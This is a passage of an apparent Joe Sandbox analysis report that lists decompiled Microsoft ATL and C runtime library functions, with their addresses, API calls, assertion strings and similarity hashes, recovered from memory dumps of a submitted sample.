                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Value_strlen
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$__atl_condVal$m_hKey != 0
                      • API String ID: 3056571664-3821136969
                      • Opcode ID: 5c50a0584735cb933a234d364e72b1f170008da97bcead8ebf3ca55a419bc951
                      • Instruction ID: 67d37f88aabe8c81f9a902f8a42a390710c7f3a358f6d4c54aaa38fb8dd9037e
                      • Opcode Fuzzy Hash: 5c50a0584735cb933a234d364e72b1f170008da97bcead8ebf3ca55a419bc951
                      • Instruction Fuzzy Hash: F7317E71E40209EFDB10DF98C842FAEB7B8AB94B04F208159E604B7281E7745B80CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0094DD40 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                      Download Yara Rule
                      C-Code - Quality: 57%
                      			E0094DD40(void* __ebx, intOrPtr __ecx, void* __esi, struct HWND__* _a4, long _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t21;
				struct HWND__* _t27;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t51;
				void* _t52;

				_t35 = __ebx;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				do {
					_t21 = _v8;
					_t54 =  *((intOrPtr*)(_t21 + 4));
					if( *((intOrPtr*)(_t21 + 4)) != 0) {
						_t34 = L00994930(_t54, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xfbd, 0, "%ls", L"this->m_hWnd == 0");
						_t52 = _t52 + 0x18;
						if(_t34 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				_v12 = E0094C490(_v8 + 8, 0, 0, 0);
				if(_v12 != 0) {
					E00943B00(_t35, 0xb33710, __eflags, _v8 + 8, _v8);
					 *((char*)(_v8 + 0x20)) = 0;
					_t27 = CreateDialogParamA(E00942B30(0xb30220), 0xca, _a4, E00952030, _a8);
					__eflags = _t52 - _t52;
					_v16 = E009D1520(_t27, _t52 - _t52);
					do {
						__eflags =  *((intOrPtr*)(_v8 + 4)) - _v16;
						if(__eflags != 0) {
							_t32 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xfcf, 0, "%ls", L"this->m_hWnd == hWnd");
							_t52 = _t52 + 0x18;
							__eflags = _t32 - 1;
							if(_t32 == 1) {
								asm("int3");
							}
						}
						__eflags = 0;
					} while (0 != 0);
					_t30 = _v16;
					L13:
					return E009D1520(_t30, _t51 - _t52 + 0xc);
				}
				SetLastError(0xe);
				E009D1520(_t22, _t52 - _t52);
				_t30 = 0;
				goto L13;
			}














                      0x0094dd40
                      0x0094dd47
                      0x0094dd4e
                      0x0094dd55
                      0x0094dd5c
                      0x0094dd5f
                      0x0094dd5f
                      0x0094dd62
                      0x0094dd66
                      0x0094dd80
                      0x0094dd85
                      0x0094dd8b
                      0x0094dd8d
                      0x0094dd8d
                      0x0094dd8b
                      0x0094dd8e
                      0x0094dda1
                      0x0094dda8
                      0x0094ddd2
                      0x0094ddda
                      0x0094ddfd
                      0x0094de03
                      0x0094de0a
                      0x0094de0d
                      0x0094de13
                      0x0094de16
                      0x0094de30
                      0x0094de35
                      0x0094de38
                      0x0094de3b
                      0x0094de3d
                      0x0094de3d
                      0x0094de3b
                      0x0094de3e
                      0x0094de3e
                      0x0094de42
                      0x0094de46
                      0x0094de53
                      0x0094de53
                      0x0094ddae
                      0x0094ddb6
                      0x0094ddbb
                      0x00000000

                      APIs
                      • SetLastError.KERNEL32(0000000E), ref: 0094DDAE
                      • CreateDialogParamA.USER32(00000000,000000CA,00000000,00952030,CCCCCCCC), ref: 0094DDFD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CreateDialogErrorLastParam
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$this->m_hWnd == 0$this->m_hWnd == hWnd
                      • API String ID: 3445605341-3995377508
                      • Opcode ID: 06c80459020e51cd4c79fe0bc5ee4cdb67b4952d765c5e4b08e3a7a42f930b3a
                      • Instruction ID: d5371e23e93bfb6ee6d7b5a25565f5755b3adefba5ab12f02d89bfb0d792756c
                      • Opcode Fuzzy Hash: 06c80459020e51cd4c79fe0bc5ee4cdb67b4952d765c5e4b08e3a7a42f930b3a
                      • Instruction Fuzzy Hash: 0D210531E81208BBCB10EBA8DD53F6EB765EF90704F208595F6046B2C2D6B49E408B95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0095BCF0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 82COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 95%
                      			E0095BCF0(intOrPtr* _a4, intOrPtr* _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t30;
				intOrPtr _t31;
				signed char _t38;
				intOrPtr _t59;
				void* _t67;

				if( *_a8 != 0) {
					L2:
					_t30 = L00994930(_t72, 2, L"d:\\a01\\_work\\38\\s\\src\\vctools\\crt\\vcruntime\\src\\eh\\std_exception.cpp", 0x12, 0, "%ls", L"to->_What == nullptr && to->_DoFree == false");
					_t67 = _t67 + 0x18;
					if(_t30 == 1) {
						asm("int3");
					}
					L4:
					if(( *(_a4 + 4) & 0x000000ff) == 0 ||  *_a4 == 0) {
						_t31 =  *_a4;
						 *_a8 = _t31;
						 *((char*)(_a8 + 4)) = 0;
						return _t31;
					} else {
						_v12 = E00992E00( *_a4) + 1;
						E0095BBF0( &_v8, L00995F00(_v12));
						_t38 = E0095BC30( &_v8);
						__eflags = _t38 & 0x000000ff;
						if((_t38 & 0x000000ff) != 0) {
							_v16 =  *_a4;
							_v20 = E0095BC80( &_v8);
							E00992DE0(_v20, _v12, _v16);
							 *_a8 = E0095BC50( &_v8);
							 *((char*)(_a8 + 4)) = 1;
							return E0095BC10( &_v8);
						}
						return E0095BC10( &_v8);
					}
				}
				_t59 = _a8;
				_t72 =  *(_t59 + 4) & 0x000000ff;
				if(( *(_t59 + 4) & 0x000000ff) == 0) {
					goto L4;
				}
				goto L2;
			}












                      0x0095bcfc
                      0x0095bd09
                      0x0095bd1e
                      0x0095bd23
                      0x0095bd29
                      0x0095bd2b
                      0x0095bd2b
                      0x0095bd2c
                      0x0095bd35
                      0x0095bd45
                      0x0095bd47
                      0x0095bd4c
                      0x00000000
                      0x0095bd55
                      0x0095bd66
                      0x0095bd79
                      0x0095bd81
                      0x0095bd89
                      0x0095bd8b
                      0x0095bd9c
                      0x0095bda7
                      0x0095bdb6
                      0x0095bdc9
                      0x0095bdce
                      0x00000000
                      0x0095bdd5
                      0x00000000
                      0x0095bd90
                      0x0095bd35
                      0x0095bcfe
                      0x0095bd05
                      0x0095bd07
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • _strlen.LIBCMT ref: 0095BD5B
                      • __aligned_msize.LIBCMTD ref: 0095BDB6
                      • __crt_unique_heap_ptr.LIBCMTD ref: 0095BDC1
                        • Part of subcall function 0095BC10: __crt_unique_heap_ptr.LIBCMTD ref: 0095BC1A
                      Strings
                      • %ls, xrefs: 0095BD0E
                      • d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp, xrefs: 0095BD17
                      • to->_What == nullptr && to->_DoFree == false, xrefs: 0095BD09
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __crt_unique_heap_ptr$__aligned_msize_strlen
                      • String ID: %ls$d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp$to->_What == nullptr && to->_DoFree == false
                      • API String ID: 3817959681-3374554652
                      • Opcode ID: 0c9995d292e9b7a6377fad1ae12b43c185911a7f830dffca1714e333cd079eb9
                      • Instruction ID: ac995aa12bfb13d514ece44c98ed5360765f07678609c7c1ab17d0e0bc57bb01
                      • Opcode Fuzzy Hash: 0c9995d292e9b7a6377fad1ae12b43c185911a7f830dffca1714e333cd079eb9
                      • Instruction Fuzzy Hash: CD312FB4A0020CAFCB04DF59C892BAEB775EF95305F54C099ED595B382EB31EA45CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009C5530 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 80timeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 95%
                      			E009C5530(intOrPtr _a4) {
				char _v8;
				char _v12;
				intOrPtr _t27;
				void* _t35;
				void* _t37;
				void* _t40;
				intOrPtr _t58;
				intOrPtr _t62;
				void* _t64;

				_t66 = _a4;
				if(_a4 == 0) {
					_t40 = L00994930(_t66, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_getbuf.cpp", 0x12, 0, L"%ls", L"public_stream != nullptr");
					_t64 = _t64 + 0x18;
					if(_t40 == 1) {
						asm("int3");
					}
				}
				E00976E20( &_v8, _a4);
				_t58 =  *0xb31184; // 0x0
				 *0xb31184 = _t58 + 1;
				_t27 = E0099C129(L0095BF60( &_v12, E00999580(0x1000, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_getbuf.cpp", 0x1b)));
				 *((intOrPtr*)(E00977320( &_v8) + 4)) = _t27;
				E0095BFA0( &_v12);
				if( *((intOrPtr*)(E00977320( &_v8) + 4)) == 0) {
					E009A9080( &_v8, 0x400);
					_t62 = E00977320( &_v8) + 0x14;
					__eflags = _t62;
					 *((intOrPtr*)(E00977320( &_v8) + 4)) = _t62;
					 *((intOrPtr*)(E00977320( &_v8) + 0x18)) = 2;
				} else {
					E009A9080( &_v8, 0x40);
					 *((intOrPtr*)(E00977320( &_v8) + 0x18)) = 0x1000;
				}
				_t35 = E00977320( &_v8);
				 *((intOrPtr*)(E00977320( &_v8))) =  *((intOrPtr*)(_t35 + 4));
				_t37 = E00977320( &_v8);
				 *((intOrPtr*)(_t37 + 8)) = 0;
				return _t37;
			}












                      0x009c5539
                      0x009c553d
                      0x009c5554
                      0x009c5559
                      0x009c555f
                      0x009c5561
                      0x009c5561
                      0x009c555f
                      0x009c5569
                      0x009c556e
                      0x009c5577
                      0x009c559e
                      0x009c55ad
                      0x009c55b3
                      0x009c55c4
                      0x009c55e9
                      0x009c55f8
                      0x009c55f8
                      0x009c5603
                      0x009c560e
                      0x009c55c6
                      0x009c55cb
                      0x009c55d8
                      0x009c55d8
                      0x009c5618
                      0x009c562a
                      0x009c562f
                      0x009c5634
                      0x009c563f

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009C5569
                      • __wcstombs_l.LIBCMTD ref: 009C558B
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp, xrefs: 009C554D
                      • %ls, xrefs: 009C5544
                      • public_stream != nullptr, xrefs: 009C553F
                      • minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp, xrefs: 009C557F
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___wcstombs_lstd::_
                      • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp$minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp$public_stream != nullptr
                      • API String ID: 2681442900-187094882
                      • Opcode ID: 2ad4900828c947389949a265e2577da2706209a8a1f0f41d4c1bec26031b45af
                      • Instruction ID: 77cadcde2c1a0081f08d845a4022b954d9997b3f0e83a47f3cd8c788bce41824
                      • Opcode Fuzzy Hash: 2ad4900828c947389949a265e2577da2706209a8a1f0f41d4c1bec26031b45af
                      • Instruction Fuzzy Hash: BC215031A40108ABCB14FB90ED57FEDB764AF90744F518098E9062B1D2DF706F48EB81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00943C10 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 74COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 36%
                      			E00943C10(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				void* _t22;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t45;
				void* _t46;
				void* _t47;

				_t45 = __esi;
				_t44 = __edi;
				_t31 = __ebx;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				E00944160(_v8 + 4, __edi, __eflags);
				_t50 =  *0xb315ec;
				if( *0xb315ec != 0) {
					_t30 = L00994930(_t50, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xbdf, 0, "%ls", L"_pAtlModule == 0");
					_t47 = _t47 + 0x18;
					_t51 = _t30 - 1;
					if(_t30 == 1) {
						asm("int3");
					}
				}
				 *((intOrPtr*)(_v8 + 4)) = 0;
				 *((intOrPtr*)(_v8 + 0xc)) = 0;
				 *((intOrPtr*)(_v8 + 8)) = 0;
				 *0xb315ec = _v8;
				 *((intOrPtr*)(_v8 + 0x28)) = 0;
				_t22 = E00942900(_v8 + 0x10, _t45, _t51);
				_t52 = _t22;
				if(_t22 >= 0) {
					 *((intOrPtr*)(_v8 + 4)) = 0x24;
				} else {
					_push("ERROR : Unable to initialize critical section in CAtlModule\n");
					_push(0);
					_push(E0094F210(0xb33704));
					_push(E009423B0( &_v16, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xbe9));
					E009423E0(_t31, _t44, _t45, _t52);
					_t47 = _t47 + 0x10;
					if(0 == 0) {
						_t29 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xbea, 0, "%ls", 0x9f40dc);
						_t47 = _t47 + 0x18;
						if(_t29 == 1) {
							asm("int3");
						}
					}
					 *0xb33675 = 1;
				}
				return E009D1520(_v8, _t46 - _t47 + 0xc);
			}













                      0x00943c10
                      0x00943c10
                      0x00943c10
                      0x00943c16
                      0x00943c1d
                      0x00943c24
                      0x00943c2b
                      0x00943c34
                      0x00943c39
                      0x00943c40
                      0x00943c5a
                      0x00943c5f
                      0x00943c62
                      0x00943c65
                      0x00943c67
                      0x00943c67
                      0x00943c65
                      0x00943c6b
                      0x00943c75
                      0x00943c7f
                      0x00943c89
                      0x00943c92
                      0x00943c9f
                      0x00943ca4
                      0x00943ca6
                      0x00943d0b
                      0x00943ca8
                      0x00943ca8
                      0x00943cad
                      0x00943cb9
                      0x00943ccc
                      0x00943ccd
                      0x00943cd2
                      0x00943cd7
                      0x00943cf1
                      0x00943cf6
                      0x00943cfc
                      0x00943cfe
                      0x00943cfe
                      0x00943cfc
                      0x00943cff
                      0x00943cff
                      0x00943d22

                      APIs
                      Strings
                      • ERROR : Unable to initialize critical section in CAtlModule, xrefs: 00943CA8
                      • %ls, xrefs: 00943C47, 00943CDE
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00943CBF
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00943C53, 00943CEA
                      • _pAtlModule == 0, xrefs: 00943C42
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Smanip
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to initialize critical section in CAtlModule$_pAtlModule == 0
                      • API String ID: 2140389272-3746135848
                      • Opcode ID: 3e4d7bf74758d703576f2b93e780f037d8e869b5e322721b8e46e727f754bc8a
                      • Instruction ID: dd76631451f5470581a795c18247cda348aef9f3fe4eb1c88ebc96cbd706c2f5
                      • Opcode Fuzzy Hash: 3e4d7bf74758d703576f2b93e780f037d8e869b5e322721b8e46e727f754bc8a
                      • Instruction Fuzzy Hash: 54216274E44308BBDB00EB98DD57F6DB7B4AB90708F248494F6056B3C2D6B1AF108B95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00945180 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 70COMMON
                      Download Yara Rule
                      C-Code - Quality: 38%
                      			E00945180(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t20;
				void* _t26;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t41;
				void* _t42;
				void* _t44;
				void* _t45;

				_t42 = __esi;
				_t41 = __edi;
				_t33 = __ebx;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				do {
					_t20 = _a4;
					_t47 =  *((intOrPtr*)(_t20 + 0x24));
					if( *((intOrPtr*)(_t20 + 0x24)) == 0) {
						_t32 = L00994930(_t47, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlcom.h", 0xe94, 0, "%ls", L"m_pfnCreateInstance != 0");
						_t45 = _t45 + 0x18;
						if(_t32 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				_v8 = 0x80004003;
				if(_a16 == 0) {
					L10:
					return E009D1520(_v8, _t44 - _t45 + 0xc);
				}
				 *_a16 = 0;
				if(_a8 == 0) {
					L9:
					_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_a8, _a12, _a16);
					__eflags = _t45 - _t45;
					_v8 = E009D1520(_t26, __eflags);
					goto L10;
				}
				_t28 = E00943640(_a12, _a12);
				_t52 = _t28;
				if(_t28 != 0) {
					goto L9;
				}
				_push("CComClassFactory: asked for non IUnknown interface while creating an aggregated object");
				_push(0);
				_push(E0094F200(0xb337b8));
				_push(E009423B0( &_v16, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlcom.h", 0xe9d));
				E009423E0(_t33, _t41, _t42, _t52);
				_t45 = _t45 + 0x10;
				_v8 = 0x80040110;
				goto L10;
			}















                      0x00945180
                      0x00945180
                      0x00945180
                      0x00945187
                      0x0094518e
                      0x00945195
                      0x0094519c
                      0x0094519c
                      0x0094519f
                      0x009451a3
                      0x009451bd
                      0x009451c2
                      0x009451c8
                      0x009451ca
                      0x009451ca
                      0x009451c8
                      0x009451cb
                      0x009451cf
                      0x009451da
                      0x0094524e
                      0x0094525f
                      0x0094525f
                      0x009451df
                      0x009451e9
                      0x0094522e
                      0x00945242
                      0x00945244
                      0x0094524b
                      0x00000000
                      0x0094524b
                      0x009451ef
                      0x009451f4
                      0x009451f6
                      0x00000000
                      0x00000000
                      0x009451f8
                      0x009451fd
                      0x00945209
                      0x0094521c
                      0x0094521d
                      0x00945222
                      0x00945225
                      0x00000000

                      APIs
                      Strings
                      • %ls, xrefs: 009451AA
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h, xrefs: 009451B6
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h, xrefs: 0094520F
                      • m_pfnCreateInstance != 0, xrefs: 009451A5
                      • CComClassFactory: asked for non IUnknown interface while creating an aggregated object, xrefs: 009451F8
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Smanip
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h$CComClassFactory: asked for non IUnknown interface while creating an aggregated object$m_pfnCreateInstance != 0
                      • API String ID: 2140389272-1138684019
                      • Opcode ID: fe5688f4639b982ff2ee62d2a006f8cb96835d061c3990e5e958f98c7bcb16a2
                      • Instruction ID: 0b69ffe6ba2aa1f7e85d2d734826e5a311fb5177cffb1e9388224cb4f98229de
                      • Opcode Fuzzy Hash: fe5688f4639b982ff2ee62d2a006f8cb96835d061c3990e5e958f98c7bcb16a2
                      • Instruction Fuzzy Hash: B1219371E40309BBDB20EF98DD42FAE77A8AB84704F108559F9146B296D6B4DE00CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0094DC80 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 60COMMON
                      Download Yara Rule
                      C-Code - Quality: 82%
                      			E0094DC80(intOrPtr __ecx, void* __esi) {
				intOrPtr _v8;
				void* _t11;
				intOrPtr _t12;
				void* _t16;
				void* _t18;
				void* _t19;
				void* _t28;
				void* _t29;

				_push(__ecx);
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_t11 = E009D1520(IsWindow( *(_v8 + 4)), _t29 - _t29);
				_t32 = _t11;
				if(_t11 == 0) {
					_t19 = L00994930(_t32, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xfdc, 0, "%ls", L"::IsWindow(this->m_hWnd)");
					_t29 = _t29 + 0x18;
					if(_t19 == 1) {
						asm("int3");
					}
				}
				_t12 = _v8;
				_t34 =  *(_t12 + 0x20) & 0x000000ff;
				if(( *(_t12 + 0x20) & 0x000000ff) != 0) {
					_t18 = L00994930(_t34, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xfde, 0, "%ls", L"!m_bModal");
					_t29 = _t29 + 0x18;
					if(_t18 == 1) {
						asm("int3");
					}
				}
				if(E009D1520(DestroyWindow( *(_v8 + 4)), _t29 - _t29) != 0) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				return E009D1520(_t16, _t28 - _t29 + 4);
			}











                      0x0094dc83
                      0x0094dc85
                      0x0094dc8c
                      0x0094dca0
                      0x0094dca5
                      0x0094dca7
                      0x0094dcc1
                      0x0094dcc6
                      0x0094dccc
                      0x0094dcce
                      0x0094dcce
                      0x0094dccc
                      0x0094dccf
                      0x0094dcd6
                      0x0094dcd8
                      0x0094dcf2
                      0x0094dcf7
                      0x0094dcfd
                      0x0094dcff
                      0x0094dcff
                      0x0094dcfd
                      0x0094dd18
                      0x0094dd1e
                      0x0094dd1a
                      0x0094dd1a
                      0x0094dd1a
                      0x0094dd31

                      APIs
                      • IsWindow.USER32(?), ref: 0094DC98
                      • DestroyWindow.USER32(?,?,?,?,0094C6A1,5D529087,?,?,009D4F30,000000FF), ref: 0094DD09
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
